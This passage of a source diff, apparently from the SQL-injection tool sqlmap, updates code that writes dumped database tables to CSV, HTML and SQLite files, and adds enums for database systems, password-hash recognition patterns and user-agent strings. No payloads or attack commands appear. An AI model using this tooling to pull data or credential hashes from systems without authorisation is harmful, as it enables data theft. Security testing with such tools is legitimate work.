settings is None: + if isNoneValue(settings): stringSettings = "" else: stringSettings = " [%d]:" % len(settings) @@ -194,10 +233,13 @@ def userSettings(self, header, userSettings, subHeader, content_type=None): self.singleString("") def dbs(self, dbs): - self.lister("available databases", dbs, content_type=API_CONTENT_TYPE.DBS) + self.lister("available databases", dbs, content_type=CONTENT_TYPE.DBS) - def dbTables(self, dbTables, content_type=API_CONTENT_TYPE.TABLES): + def dbTables(self, dbTables): if isinstance(dbTables, dict) and len(dbTables) > 0: + if conf.api: + self._write(dbTables, content_type=CONTENT_TYPE.TABLES) + maxlength = 0 for tables in dbTables.values(): @@ -205,14 +247,14 @@ def dbTables(self, dbTables, content_type=API_CONTENT_TYPE.TABLES): if table and isListLike(table): table = table[0] - maxlength = max(maxlength, len(normalizeUnicode(table) or str(table))) + maxlength = max(maxlength, getConsoleLength(unsafeSQLIdentificatorNaming(getUnicode(table)))) lines = "-" * (int(maxlength) + 2) for db, tables in dbTables.items(): - tables.sort() + tables = sorted(filter(None, tables)) - self._write("Database: %s" % db if db else "Current database") + self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "") if len(tables) == 1: self._write("[1 table]") @@ -225,17 +267,21 @@ def dbTables(self, dbTables, content_type=API_CONTENT_TYPE.TABLES): if table and isListLike(table): table = table[0] - blank = " " * (maxlength - len(normalizeUnicode(table) or str(table))) + table = unsafeSQLIdentificatorNaming(table) + blank = " " * (maxlength - getConsoleLength(getUnicode(table))) self._write("| %s%s |" % (table, blank)) self._write("+%s+\n" % lines) elif dbTables is None or len(dbTables) == 0: - self.singleString("No tables found") + self.singleString("No tables found", content_type=CONTENT_TYPE.TABLES) else: - self.string("tables", dbTables) + self.string("tables", dbTables, content_type=CONTENT_TYPE.TABLES) - def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): + def dbTableColumns(self, tableColumns, content_type=None): if isinstance(tableColumns, dict) and len(tableColumns) > 0: + if conf.api: + self._write(tableColumns, content_type=content_type) + for db, tables in tableColumns.items(): if not db: db = "All" @@ -246,12 +292,13 @@ def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): colType = None - colList = columns.keys() - colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) + colList = list(columns.keys()) + colList.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) for column in colList: colType = columns[column] + column = unsafeSQLIdentificatorNaming(column) maxlength1 = max(maxlength1, len(column or "")) maxlength2 = max(maxlength2, len(colType or "")) @@ -262,7 +309,7 @@ def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): maxlength2 = max(maxlength2, len("TYPE")) lines2 = "-" * (maxlength2 + 2) - self._write("Database: %s\nTable: %s" % (db if db else "Current database", table)) + self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "", unsafeSQLIdentificatorNaming(table))) if len(columns) == 1: self._write("[1 column]") @@ -288,6 +335,8 @@ def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): for column in colList: colType = columns[column] + + column = unsafeSQLIdentificatorNaming(column) blank1 = " " * (maxlength1 - len(column)) if colType is not None: @@ -301,18 +350,21 @@ def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): else: self._write("+%s+\n" % lines1) - def dbTablesCount(self, dbTables, content_type=API_CONTENT_TYPE.COUNT): + def dbTablesCount(self, dbTables): if isinstance(dbTables, dict) and len(dbTables) > 0: + if conf.api: + self._write(dbTables, content_type=CONTENT_TYPE.COUNT) + maxlength1 = len("Table") maxlength2 = len("Entries") for ctables in dbTables.values(): for tables in ctables.values(): for table in tables: - maxlength1 = max(maxlength1, len(normalizeUnicode(table) or str(table))) + maxlength1 = max(maxlength1, getConsoleLength(getUnicode(table))) for db, counts in dbTables.items(): - self._write("Database: %s" % db if db else "Current database") + self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "") lines1 = "-" * (maxlength1 + 2) blank1 = " " * (maxlength1 - len("Table")) @@ -323,7 +375,7 @@ def dbTablesCount(self, dbTables, content_type=API_CONTENT_TYPE.COUNT): self._write("| Table%s | Entries%s |" % (blank1, blank2)) self._write("+%s+%s+" % (lines1, lines2)) - sortedCounts = counts.keys() + sortedCounts = list(counts.keys()) sortedCounts.sort(reverse=True) for count in sortedCounts: @@ -332,10 +384,10 @@ def dbTablesCount(self, dbTables, content_type=API_CONTENT_TYPE.COUNT): if count is None: count = "Unknown" - tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) + tables.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) for table in tables: - blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or str(table))) + blank1 = " " * (maxlength1 - getConsoleLength(getUnicode(table))) blank2 = " " * (maxlength2 - len(str(count))) self._write("| %s%s | %d%s |" % (table, blank1, count, blank2)) @@ -343,10 +395,12 @@ def dbTablesCount(self, dbTables, content_type=API_CONTENT_TYPE.COUNT): else: logger.error("unable to retrieve the number of entries for any table") - def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): + def dbTableValues(self, tableValues): replication = None rtable = None dumpFP = None + appendToFile = False + warnFile = False if tableValues is None: return @@ -356,23 +410,95 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): db = "All" table = tableValues["__infos__"]["table"] + if conf.api: + self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) + + try: + dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) + except UnicodeError: + try: + dumpDbPath = os.path.join(conf.dumpPath, normalizeUnicode(unsafeSQLIdentificatorNaming(db))) + except (UnicodeError, OSError): + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + warnMsg = "currently unable to use regular dump directory. " + warnMsg += "Using temporary directory '%s' instead" % tempDir + logger.warning(warnMsg) + + dumpDbPath = tempDir + if conf.dumpFormat == DUMP_FORMAT.SQLITE: - replication = Replication("%s%s%s.sqlite3" % (conf.dumpPath, os.sep, unsafeSQLIdentificatorNaming(db))) + replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): - dumpDbPath = "%s%s%s" % (conf.dumpPath, os.sep, unsafeSQLIdentificatorNaming(db)) - if not os.path.isdir(dumpDbPath): - os.makedirs(dumpDbPath, 0755) + try: + os.makedirs(dumpDbPath) + except: + warnFile = True - dumpFileName = "%s%s%s.%s" % (dumpDbPath, os.sep, unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()) - dumpFP = openFile(dumpFileName, "wb") + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db)) + dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(getBytes(db)).hexdigest()[:8])) + + if not os.path.isdir(dumpDbPath): + try: + os.makedirs(dumpDbPath) + except Exception as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + warnMsg = "unable to create dump directory " + warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex)) + warnMsg += "Using temporary directory '%s' instead" % tempDir + logger.warning(warnMsg) + + dumpDbPath = tempDir + + dumpFileName = conf.dumpFile or os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) + if not checkFile(dumpFileName, False): + try: + openFile(dumpFileName, "w+").close() + except SqlmapSystemException: + raise + except: + warnFile = True + + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table))) + if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table)) + dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(getBytes(table)).hexdigest()[:8], conf.dumpFormat.lower())) + else: + dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) + else: + appendToFile = any((conf.limitStart, conf.limitStop)) + + if not appendToFile: + count = 1 + while True: + candidate = "%s.%d" % (dumpFileName, count) + if not checkFile(candidate, False): + try: + shutil.copyfile(dumpFileName, candidate) + except IOError: + pass + break + else: + count += 1 + + dumpFP = openFile(dumpFileName, 'w' if not appendToFile else 'a', buffering=DUMP_FILE_BUFFER_SIZE) count = int(tableValues["__infos__"]["count"]) + if count > TRIM_STDOUT_DUMP_SIZE: + warnMsg = "console output will be trimmed to " + warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE + warnMsg += "large table size" + logger.warning(warnMsg) + separator = str() field = 1 fields = len(tableValues) - 1 - columns = prioritySortColumns(tableValues.keys()) + columns = prioritySortColumns(list(tableValues.keys())) + + if conf.col: + cols = conf.col.split(',') + columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0) for column in columns: if column != "__infos__": @@ -381,7 +507,7 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): separator += "+%s" % lines separator += "+" - self._write("Database: %s\nTable: %s" % (db if db else "Current database", table)) + self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "", unsafeSQLIdentificatorNaming(table))) if conf.dumpFormat == DUMP_FORMAT.SQLITE: cols = [] @@ -390,7 +516,8 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): if column != "__infos__": colType = Replication.INTEGER - for value in tableValues[column]['values']: + for i in xrange(min(CHECK_SQLITE_TYPE_THRESHOLD, len(tableValues[column]['values']))): + value = tableValues[column]['values'][i] try: if not value or value == " ": # NULL continue @@ -403,7 +530,8 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): if colType is None: colType = Replication.REAL - for value in tableValues[column]['values']: + for i in xrange(min(CHECK_SQLITE_TYPE_THRESHOLD, len(tableValues[column]['values']))): + value = tableValues[column]['values'][i] try: if not value or value == " ": # NULL continue @@ -413,12 +541,16 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): colType = None break - cols.append((column, colType if colType else Replication.TEXT)) + cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT)) rtable = replication.createTable(table, cols) elif conf.dumpFormat == DUMP_FORMAT.HTML: - documentNode = getDOMImplementation().createDocument(None, "table", None) - tableNode = documentNode.documentElement + dataToDumpFile(dumpFP, "\n\n\n") + dataToDumpFile(dumpFP, "\n" % UNICODE_ENCODING) + dataToDumpFile(dumpFP, "\n" % VERSION_STRING) + dataToDumpFile(dumpFP, "%s\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) + dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) + dataToDumpFile(dumpFP, "\n\n\n\n\n\n") if count == 1: self._write("[1 entry]") @@ -427,56 +559,48 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): self._write(separator) - if conf.dumpFormat == DUMP_FORMAT.HTML: - headNode = documentNode.createElement("thead") - rowNode = documentNode.createElement("tr") - tableNode.appendChild(headNode) - headNode.appendChild(rowNode) - bodyNode = documentNode.createElement("tbody") - tableNode.appendChild(bodyNode) - for column in columns: if column != "__infos__": info = tableValues[column] + + column = unsafeSQLIdentificatorNaming(column) maxlength = int(info["length"]) - blank = " " * (maxlength - len(column)) + blank = " " * (maxlength - getConsoleLength(column)) self._write("| %s%s" % (column, blank), newline=False) - if conf.dumpFormat == DUMP_FORMAT.CSV: - if field == fields: - dataToDumpFile(dumpFP, "%s" % safeCSValue(column)) - else: - dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel)) - elif conf.dumpFormat == DUMP_FORMAT.HTML: - entryNode = documentNode.createElement("td") - rowNode.appendChild(entryNode) - entryNode.appendChild(documentNode.createTextNode(column)) + if not appendToFile: + if conf.dumpFormat == DUMP_FORMAT.CSV: + if field == fields: + dataToDumpFile(dumpFP, "%s" % safeCSValue(column)) + else: + dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel)) + elif conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "" % (field - 1, getUnicode(htmlEscape(column).encode("ascii", "xmlcharrefreplace")))) field += 1 + if conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "\n\n\n\n") + self._write("|\n%s" % separator) if conf.dumpFormat == DUMP_FORMAT.CSV: - dataToDumpFile(dumpFP, "\n") + dataToDumpFile(dumpFP, "\n" if not appendToFile else "") elif conf.dumpFormat == DUMP_FORMAT.SQLITE: rtable.beginTransaction() - if count > TRIM_STDOUT_DUMP_SIZE: - warnMsg = "console output will be trimmed to " - warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE - warnMsg += "large table size" - logger.warning(warnMsg) - for i in xrange(count): console = (i >= count - TRIM_STDOUT_DUMP_SIZE) field = 1 values = [] + if i == 0 and count > TRIM_STDOUT_DUMP_SIZE: + self._write(" ...") + if conf.dumpFormat == DUMP_FORMAT.HTML: - rowNode = documentNode.createElement("tr") - bodyNode.appendChild(rowNode) + dataToDumpFile(dumpFP, "") for column in columns: if column != "__infos__": @@ -491,21 +615,31 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): value = getUnicode(info["values"][i]) value = DUMP_REPLACEMENTS.get(value, value) - values.append(value) + if conf.dumpFormat == DUMP_FORMAT.SQLITE: + values.append(value) + maxlength = int(info["length"]) - blank = " " * (maxlength - len(value)) + blank = " " * (maxlength - getConsoleLength(value)) self._write("| %s%s" % (value, blank), newline=False, console=console) if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value: - mimetype = magic.from_buffer(value, mime=True) - if any(mimetype.startswith(_) for _ in ("application", "image")): - filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (column, randomInt(8))) - warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) - logger.warn(warnMsg) + try: + mimetype = getText(magic.from_buffer(value, mime=True)) + if any(mimetype.startswith(_) for _ in ("application", "image")): + if not os.path.isdir(dumpDbPath): + os.makedirs(dumpDbPath) + + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column))) + filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) + warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) + logger.warning(warnMsg) - with open(filepath, "wb") as f: - _ = safechardecode(value, True) - f.write(_) + with openFile(filepath, "w+b", None) as f: + _ = safechardecode(value, True) + f.write(_) + + except Exception as ex: + logger.debug(getSafeExString(ex)) if conf.dumpFormat == DUMP_FORMAT.CSV: if field == fields: @@ -513,9 +647,7 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): else: dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel)) elif conf.dumpFormat == DUMP_FORMAT.HTML: - entryNode = documentNode.createElement("td") - rowNode.appendChild(entryNode) - entryNode.appendChild(documentNode.createTextNode(value)) + dataToDumpFile(dumpFP, "" % getUnicode(htmlEscape(value).encode("ascii", "xmlcharrefreplace"))) field += 1 @@ -526,6 +658,8 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): pass elif conf.dumpFormat == DUMP_FORMAT.CSV: dataToDumpFile(dumpFP, "\n") + elif conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "\n") self._write("|", console=console) @@ -533,60 +667,62 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): if conf.dumpFormat == DUMP_FORMAT.SQLITE: rtable.endTransaction() - logger.info("table '%s.%s' dumped to sqlite3 database '%s'" % (db, table, replication.dbpath)) + logger.info("table '%s.%s' dumped to SQLITE database '%s'" % (db, table, replication.dbpath)) elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): if conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n\n\n") - dataToDumpFile(dumpFP, "\n" % UNICODE_ENCODING) - dataToDumpFile(dumpFP, "%s\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) - dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) - dataToDumpFile(dumpFP, "\n\n") - dataToDumpFile(dumpFP, tableNode.toxml()) - dataToDumpFile(dumpFP, "\n") + dataToDumpFile(dumpFP, "\n
%s
%s
\n\n\n") else: dataToDumpFile(dumpFP, "\n") dumpFP.close() - logger.info("table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)) - def dbColumns(self, dbColumnsDict, colConsider, dbs, content_type=API_CONTENT_TYPE.COLUMNS): - for column in dbColumnsDict.keys(): - if colConsider == "1": - colConsiderStr = "s like '" + column + "' were" + msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName) + if not warnFile: + logger.info(msg) else: - colConsiderStr = " '%s' was" % column + logger.warning(msg) - msg = "Column%s found in the " % colConsiderStr - msg += "following databases:" - self._write(msg) + def dbColumns(self, dbColumnsDict, colConsider, dbs): + if conf.api: + self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS) - _ = {} + for column in dbColumnsDict.keys(): + if colConsider == "1": + colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column) + else: + colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column) + found = {} for db, tblData in dbs.items(): for tbl, colData in tblData.items(): for col, dataType in colData.items(): if column.lower() in col.lower(): - if db in _: - if tbl in _[db]: - _[db][tbl][col] = dataType + if db in found: + if tbl in found[db]: + found[db][tbl][col] = dataType else: - _[db][tbl] = {col: dataType} + found[db][tbl] = {col: dataType} else: - _[db] = {} - _[db][tbl] = {col: dataType} + found[db] = {} + found[db][tbl] = {col: dataType} continue - self.dbTableColumns(_) + if found: + msg = "column%s found in the " % colConsiderStr + msg += "following databases:" + self._write(msg) + + self.dbTableColumns(found) - def query(self, query, queryRes): - self.string(query, queryRes, content_type=API_CONTENT_TYPE.SQL_QUERY) + def sqlQuery(self, query, queryRes): + self.string(query, queryRes, content_type=CONTENT_TYPE.SQL_QUERY) def rFile(self, fileData): - self.lister("files saved to", fileData, sort=False, content_type=API_CONTENT_TYPE.FILE_READ) + self.lister("files saved to", fileData, sort=False, content_type=CONTENT_TYPE.FILE_READ) - def registerValue(self): - self.string("Registry key value data", registerData, registerData, content_type=API_CONTENT_TYPE.REG_READ, sort=False) + def registerValue(self, registerData): + self.string("Registry key value data", registerData, content_type=CONTENT_TYPE.REG_READ, sort=False) # object to manage how to print the retrieved queries output to # standard output and sessions file diff --git a/lib/core/enums.py b/lib/core/enums.py index d05c053470c..689055a3c21 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -1,11 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -class PRIORITY: +class PRIORITY(object): LOWEST = -100 LOWER = -50 LOW = -10 @@ -14,7 +14,7 @@ class PRIORITY: HIGHER = 50 HIGHEST = 100 -class SORT_ORDER: +class SORT_ORDER(object): FIRST = 0 SECOND = 1 THIRD = 2 @@ -22,7 +22,16 @@ class SORT_ORDER: FIFTH = 4 LAST = 100 -class DBMS: +# Reference: https://docs.python.org/2/library/logging.html#logging-levels +class LOGGING_LEVELS(object): + NOTSET = 0 + DEBUG = 10 + INFO = 20 + WARNING = 30 + ERROR = 40 + CRITICAL = 50 + +class DBMS(object): ACCESS = "Microsoft Access" DB2 = "IBM DB2" FIREBIRD = "Firebird" @@ -33,8 +42,27 @@ class DBMS: PGSQL = "PostgreSQL" SQLITE = "SQLite" SYBASE = "Sybase" - -class DBMS_DIRECTORY_NAME: + INFORMIX = "Informix" + HSQLDB = "HSQLDB" + H2 = "H2" + MONETDB = "MonetDB" + DERBY = "Apache Derby" + VERTICA = "Vertica" + MCKOI = "Mckoi" + PRESTO = "Presto" + ALTIBASE = "Altibase" + MIMERSQL = "MimerSQL" + CLICKHOUSE = "ClickHouse" + CRATEDB = "CrateDB" + CUBRID = "Cubrid" + CACHE = "InterSystems Cache" + EXTREMEDB = "eXtremeDB" + FRONTBASE = "FrontBase" + RAIMA = "Raima Database Manager" + VIRTUOSO = "Virtuoso" + SNOWFLAKE = "Snowflake" + +class DBMS_DIRECTORY_NAME(object): ACCESS = "access" DB2 = "db2" FIREBIRD = "firebird" @@ -45,17 +73,56 @@ class DBMS_DIRECTORY_NAME: PGSQL = "postgresql" SQLITE = "sqlite" SYBASE = "sybase" - -class CUSTOM_LOGGING: + HSQLDB = "hsqldb" + H2 = "h2" + INFORMIX = "informix" + MONETDB = "monetdb" + DERBY = "derby" + VERTICA = "vertica" + MCKOI = "mckoi" + PRESTO = "presto" + ALTIBASE = "altibase" + MIMERSQL = "mimersql" + CLICKHOUSE = "clickhouse" + CRATEDB = "cratedb" + CUBRID = "cubrid" + CACHE = "cache" + EXTREMEDB = "extremedb" + FRONTBASE = "frontbase" + RAIMA = "raima" + VIRTUOSO = "virtuoso" + SNOWFLAKE = "snowflake" + +class FORK(object): + MARIADB = "MariaDB" + MEMSQL = "MemSQL" + PERCONA = "Percona" + COCKROACHDB = "CockroachDB" + TIDB = "TiDB" + REDSHIFT = "Amazon Redshift" + GREENPLUM = "Greenplum" + DRIZZLE = "Drizzle" + IGNITE = "Apache Ignite" + AURORA = "Aurora" + ENTERPRISEDB = "EnterpriseDB" + YELLOWBRICK = "Yellowbrick" + IRIS = "Iris" + YUGABYTEDB = "YugabyteDB" + OPENGAUSS = "OpenGauss" + DM8 = "DM8" + DORIS = "Doris" + STARROCKS = "StarRocks" + +class CUSTOM_LOGGING(object): PAYLOAD = 9 TRAFFIC_OUT = 8 TRAFFIC_IN = 7 -class OS: +class OS(object): LINUX = "Linux" WINDOWS = "Windows" -class PLACE: +class PLACE(object): GET = "GET" POST = "POST" URI = "URI" @@ -66,71 +133,111 @@ class PLACE: CUSTOM_POST = "(custom) POST" CUSTOM_HEADER = "(custom) HEADER" -class POST_HINT: +class POST_HINT(object): SOAP = "SOAP" JSON = "JSON" + JSON_LIKE = "JSON-like" MULTIPART = "MULTIPART" XML = "XML (generic)" + ARRAY_LIKE = "Array-like" -class HTTPMETHOD: +class HTTPMETHOD(object): GET = "GET" POST = "POST" HEAD = "HEAD" - -class NULLCONNECTION: + PUT = "PUT" + DELETE = "DELETE" + TRACE = "TRACE" + OPTIONS = "OPTIONS" + CONNECT = "CONNECT" + PATCH = "PATCH" + +class NULLCONNECTION(object): HEAD = "HEAD" RANGE = "Range" + SKIP_READ = "skip-read" -class REFLECTIVE_COUNTER: +class REFLECTIVE_COUNTER(object): MISS = "MISS" HIT = "HIT" -class CHARSET_TYPE: +class CHARSET_TYPE(object): BINARY = 1 DIGITS = 2 HEXADECIMAL = 3 ALPHA = 4 ALPHANUM = 5 -class HEURISTIC_TEST: +class HEURISTIC_TEST(object): CASTED = 1 NEGATIVE = 2 POSITIVE = 3 -class HASH: +class HASH(object): MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z' MYSQL_OLD = r'(?i)\A(?![0-9]+\Z)[0-9a-f]{16}\Z' POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z' MSSQL = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{40}\Z' MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z' + MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z' ORACLE = r'(?i)\As:[0-9a-f]{60}\Z' - ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z' - MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z' - SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z' - CRYPT_GENERIC = r'(?i)\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z' - WORDPRESS = r'(?i)\A\$P\$[./0-9A-Za-z]{31}\Z' - -# Reference: http://www.zytrax.com/tech/web/mobile_ids.html -class MOBILES: - BLACKBERRY = ("BlackBerry 9900", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+") - GALAXY = ("Samsung Galaxy S", "Mozilla/5.0 (Linux; U; Android 2.2; en-US; SGH-T959D Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1") + ORACLE_OLD = r'(?i)\A[0-9a-f]{16}\Z' + MD5_GENERIC = r'(?i)\A(0x)?[0-9a-f]{32}\Z' + SHA1_GENERIC = r'(?i)\A(0x)?[0-9a-f]{40}\Z' + SHA224_GENERIC = r'(?i)\A[0-9a-f]{56}\Z' + SHA256_GENERIC = r'(?i)\A(0x)?[0-9a-f]{64}\Z' + SHA384_GENERIC = r'(?i)\A[0-9a-f]{96}\Z' + SHA512_GENERIC = r'(?i)\A(0x)?[0-9a-f]{128}\Z' + CRYPT_GENERIC = r'\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z' + JOOMLA = r'\A[0-9a-f]{32}:\w{32}\Z' + PHPASS = r'\A\$[PHQS]\$[./0-9a-zA-Z]{31}\Z' + APACHE_MD5_CRYPT = r'\A\$apr1\$.{1,8}\$[./a-zA-Z0-9]+\Z' + UNIX_MD5_CRYPT = r'\A\$1\$.{1,8}\$[./a-zA-Z0-9]+\Z' + APACHE_SHA1 = r'\A\{SHA\}[a-zA-Z0-9+/]+={0,2}\Z' + VBULLETIN = r'\A[0-9a-fA-F]{32}:.{30}\Z' + VBULLETIN_OLD = r'\A[0-9a-fA-F]{32}:.{3}\Z' + OSCOMMERCE_OLD = r'\A[0-9a-fA-F]{32}:.{2}\Z' + SSHA = r'\A\{SSHA\}[a-zA-Z0-9+/]+={0,2}\Z' + SSHA256 = r'\A\{SSHA256\}[a-zA-Z0-9+/]+={0,2}\Z' + SSHA512 = r'\A\{SSHA512\}[a-zA-Z0-9+/]+={0,2}\Z' + DJANGO_MD5 = r'\Amd5\$[^$]*\$[0-9a-f]{32}\Z' + DJANGO_SHA1 = r'\Asha1\$[^$]*\$[0-9a-f]{40}\Z' + MD5_BASE64 = r'\A[a-zA-Z0-9+/]{22}==\Z' + SHA1_BASE64 = r'\A[a-zA-Z0-9+/]{27}=\Z' + SHA256_BASE64 = r'\A[a-zA-Z0-9+/]{43}=\Z' + SHA512_BASE64 = r'\A[a-zA-Z0-9+/]{86}==\Z' + +# Reference: https://whatmyuseragent.com/brand/ +class MOBILES(object): + BLACKBERRY = ("BlackBerry Z10", "Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.3.2205 Mobile Safari/537.35+") + GALAXY = ("Samsung Galaxy A54", "Mozilla/5.0 (Linux; Android 15; SM-A546B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.155 Mobile Safari/537.36 AirWatchBrowser/25.08.0.2131") HP = ("HP iPAQ 6365", "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)") - HTC = ("HTC Sensation", "Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30") - IPHONE = ("Apple iPhone 4s", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3") + HTC = ("HTC One X2", "Mozilla/5.0 (Linux; Android 14; X2-HT) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.46 Mobile Safari/537.36") + HUAWEI = ("Huawei Honor 90 Pro", "Mozilla/5.0 (Linux; Android 15; REP-AN00 Build/HONORREP-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/133.0.6943.137 Mobile Safari/537.36") + IPHONE = ("Apple iPhone 15 Pro Max", "Mozilla/7.0 (iPhone; CPU iPhone OS 18_7; iPhone 15 Pro Max) AppleWebKit/533.2 (KHTML, like Gecko) CriOS/126.0.6478.35 Mobile/15E148 Safari/804.17") + LUMIA = ("Microsoft Lumia 950 XL", "Mozilla/5.0 (Windows Mobile 10; Android 10.0;Microsoft;Lumia 950XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 Edge/40.15254.603") NEXUS = ("Google Nexus 7", "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19") NOKIA = ("Nokia N97", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 